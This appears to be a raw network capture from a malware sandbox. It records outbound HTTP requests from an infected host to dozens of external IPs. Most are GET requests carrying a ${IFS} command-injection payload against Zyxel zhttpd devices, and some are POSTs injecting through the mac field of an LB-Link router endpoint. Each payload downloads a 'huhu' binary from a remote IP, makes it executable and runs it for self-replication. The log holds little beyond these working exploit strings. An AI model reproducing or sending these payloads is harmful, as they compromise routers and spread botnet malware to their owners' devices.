                                      Jan 19, 2024 17:29:52.168745995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9395192.168.2.1451304213.45.42.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168776035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9396192.168.2.14532622.248.167.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168836117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9397192.168.2.1454930135.129.35.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168881893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9398192.168.2.1458024197.181.151.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168906927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9399192.168.2.145531644.17.239.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168942928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9400192.168.2.1432806134.167.32.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168971062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9401192.168.2.145202293.228.232.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.169006109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9402192.168.2.144021060.17.58.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.169044018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9403192.168.2.143655423.122.81.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.172092915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9404192.168.2.1447918197.162.205.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.172316074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9405192.168.2.143573431.180.32.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.172337055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9406192.168.2.145360027.0.133.1768080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.525412083 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9407192.168.2.144376252.48.194.1418080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.107309103 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:53.320116997 CET1286INHTTP/1.1 400
                                      Content-Type: text/html;charset=utf-8
                                      Content-Language: en
                                      Content-Length: 1127
                                      Date: Fri, 19 Jan 2024 16:29:53 GMT
                                      Connection: close
                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 6e 6f 74 20 6f 72 20 77 69 6c 6c 20 6e 6f 74 20 70 72 6f 63 65 73 73 20 74 68 65 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 73 6f 6d 65 74 68 69 6e 67 20 74 68 61 74 20 69 73 20 70 65 72 63 65 69 76 65 64 20 74 6f 20 62 65 20 61 20 63 6c 69 65 6e 74 20 65 72 72 6f 72 20 28 65 2e 67 2e 2c 20 6d 61 6c 66 6f 72 6d 65 64 20 72 65 71 75 65 73 74 20 73 79 6e 74 61 78 2c 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 20 6d 65 73 73 61 67 65 20 66 72 61 6d 69 6e 67 2c 20 6f 72 20 64 65 63 65 70 74 69 76 65 20 72 65 71 75 65 73 74 20 72 6f 75 74 69 6e 67 29 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 34 35 3c 2f 68 33 3e 3c 2f 62 6f 64
                                      Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 400 Bad Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 Bad Request</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing).</p><hr class="line" /><h3>Apache Tomcat/8.5.45</h3></bod


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9408192.168.2.146021853.92.153.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181248903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9409192.168.2.1449614120.198.196.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181294918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9410192.168.2.1436424221.166.113.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181350946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9411192.168.2.144104482.123.142.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181413889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9412192.168.2.145894282.205.104.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181446075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9413192.168.2.1441428206.45.126.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181478977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9414192.168.2.143707899.41.29.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181524038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9415192.168.2.1446798212.111.224.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181576014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9416192.168.2.144669664.99.107.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181607962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9417192.168.2.1450576141.148.91.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181644917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9418192.168.2.145077225.75.39.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181699991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9419192.168.2.1434134105.141.206.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181710958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9420192.168.2.1447364206.113.157.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181776047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9421192.168.2.144620089.130.178.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181814909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9422192.168.2.1433166206.168.92.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181853056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9423192.168.2.144219899.252.7.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181898117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9424192.168.2.1455818204.205.63.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181926012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9425192.168.2.1444110151.104.213.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.181952953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9426192.168.2.145184032.74.170.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182034969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9427192.168.2.144606082.205.95.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182075024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9428192.168.2.144767662.111.80.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182123899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9429192.168.2.145864098.185.35.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182137012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9430192.168.2.1444024201.218.146.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182188988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9431192.168.2.1435876117.72.145.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182243109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9432192.168.2.1457500188.230.238.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182260990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9433192.168.2.1440588145.128.141.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182331085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9434192.168.2.1456640209.102.175.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182368994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9435192.168.2.1454628137.209.46.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182406902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9436192.168.2.144233488.163.33.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182427883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9437192.168.2.143511258.55.105.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182491064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9438192.168.2.1433648138.166.35.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182528973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9439192.168.2.144774484.10.220.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182581902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9440192.168.2.1451252213.201.186.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182636976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9441192.168.2.1459486119.132.14.5443
                                      TimestampBytes transferredDirectionData
